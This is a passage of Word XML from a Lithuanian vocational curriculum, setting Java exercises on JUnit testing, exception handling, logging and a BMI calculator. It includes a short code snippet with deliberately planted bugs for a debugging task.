          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. Testuoti programinę įrangą naudojant su </w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pasirinkta</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> programavimo kalba suderinamus testavimo įrankius ir metodus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc601302899"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1  užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE NAUJĄ JAVA PROJEKTĄ VARDU JAVATESTING</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 xml:space="preserve"> Projekte sukurkite Java paketą javajunit. Jame sukurkite klasę JavaForTesting.java. Klasė turi mokėti priimti vardą ir jį grąžinti. Prie projekto pridėkite junit test</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>avimo karkasą. Naudokite 5 JUnit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> versiją</w:t>
      </w:r>
      <w:bookmarkStart w:id="103" w:name="_Toc1231429349"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PARAŠYKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1  užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTAM PROJEKTUI VIENĄ PAPRASTĄ  TESTĄ, KURIS PATIKRINA AR KLASĖ JAVAFORTESTING VEIKIA TEISINGAI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc1935195866"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE NAUJĄ JAVA PROJEKTĄ VARDU TESTING</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lastRenderedPageBreak/>
        <w:t>Jame sukurkite klasę Calculator.java. Klasė turi būti patalpinta į paketą vardu javatesting. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje realizuokite paprasto skaičiuotuvo funkcionalumą (+, -, *, /), skaičiuotuvas turi mokėti atlikti paprastas aritmetines operacijas su skaičiais. Prie projekto prijunkite JUnit testavimo biblioteką. Parašykite testus, kurie patikrintų ar skaičiuotuvas dirba be klaidų</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc140993269"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00C14E62" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 KOMPETENCIJOS 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">.3. MOKYMOSI REZULTATO </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  REALIZUOTAI PARDUOTUVEI SU PREKIŲ KREPŠELIU PARAŠYKITE JUNIT TESTUS, KURIE PATIKRINTŲ PRODUKTŲ GRUPIŲ IR PREKIŲ KREPŠELIO FUNKCIONALUMĄ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc585708180"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA K</w:t>
      </w:r>
      <w:r w:rsidR="00D364E2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LASĘ VARDU SIMPLEEXCEPTION.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exceptions. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi generuoti sveikų skaičių masyvą, užpildomą atsitiktinai. Naudojamas paprastas masyvas, kurio ilgis 10 elementų. Į masyvą bandome įrašyti 20 atsitiktinių skaičių. Jei pildant masyvą įvyks klaida, ją reikia apdoroti ir pranešti vartotojui, kad masyvas yra per mažas. Masyvas turi būti užpildytas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc878558541"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JA</w:t>
      </w:r>
      <w:r w:rsidR="00D364E2" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA KLASĘ VARDU FILEREADERS.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color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javaexceptions. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti informacijos skaitymą iš tekstinio failo. Visos klaidos ir išimtys skaitant informaciją iš failo turi būti apdorotos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc1223463117"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE J</w:t>
      </w:r>
      <w:r w:rsidR="00534113" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AVA KLASĘ VARDU JAVALOGGER.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javalogers. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti Fibonacci skaičių mažesnių už 1000 spausdinimą. Klasėje turi būti panaudotas standartinis Java žurnalizavimo įrankis Logger. Į komandinę eilutę turi būti išvesti prasmingi pranešimai vartotojui apie programos veikimą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc458538054"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE JAVA </w:t>
      </w:r>
      <w:r w:rsidR="00534113" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KLASĘ VARDU JAVAFILELOGGER.JAVA</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color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javalogers. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti daugybos lentelės (iki 10) spausdinimą komandinėje eilutėje. Klasėje turi būti panaudotas nestandartinis Java žurnalizavimo įrankis log4j. Prasmingi pranešimai apie programos veikimą turi būti įrašyti į failą javafilelogger.log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc1122933795"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. IŠBANDYKITE PATEIKTĄ JAVA PROGRAMINĮ KODĄ</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojant standartinius IDE kodo derinimo įrankius raskite visas kode paslėptas klaidas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>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Debug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quare perimeter \n and area counte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canner input = new Scanner(System.in);</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nput.clos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Input square side, a =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a = input.nextDouble();</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a &gt;= 0)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ouble area = Math.sqrt(a);</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ouble perimeter = 6 * 2a;</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Square area A = " + perimete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Square perimeter P = " + area);</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if (a = 0) {</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Error! The length of the side is to be a positive number.");</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389"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rFonts w:eastAsia="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NORINT PATIKRINTI ŽMOGAUS KŪNO MASĖS IND</w:t>
      </w:r>
      <w:r w:rsidR="00756244" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>EKSĄ, REIKALINGAS SKAIČIUOTUVAS</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sukurkite projektą BMI, skirtą šiai užduočiai. Turi būti galimybė atlikti kūno masės skaičiavimo veiksmus nekuriant papildomų objektų. Projekte sukurti metodus: bmiCount, kuris skaičiuotų žmogaus kūno masės indeksą, readFromConsole, kuris leistų įvesti žmogaus aukštį ir svorį iš komandinės eilutės ir printbmi, kuris atspausdintų žmogaus BMI komandinėje eilutėje ir įrašytų šią informaciją į failą vardu bmi.txt. Klasės metodų veikimą pademonstruokite Main metode</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002324C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="432" w:right="282" w:hanging="432"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="111" w:name="_Toc14392425"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „I</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8" w:rsidRPr="006F1DA8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nformacinių sistemų testavimas</w:t>
      </w:r>
      <w:r w:rsidR="002F1904" w:rsidRPr="006F1DA8">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="432" w:right="282" w:hanging="432"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002324C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Hlk14111279"/>
      <w:bookmarkStart w:id="113" w:name="_Toc14392426"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kurti ir vykdyti nesudėtingus testavimo atvejus rankiniu būdu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002324C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Hlk14110082"/>
      <w:bookmarkStart w:id="115" w:name="_Toc14392427"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Suprasti programinės įrangos kūrimo ciklą ir testavimo tikslus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
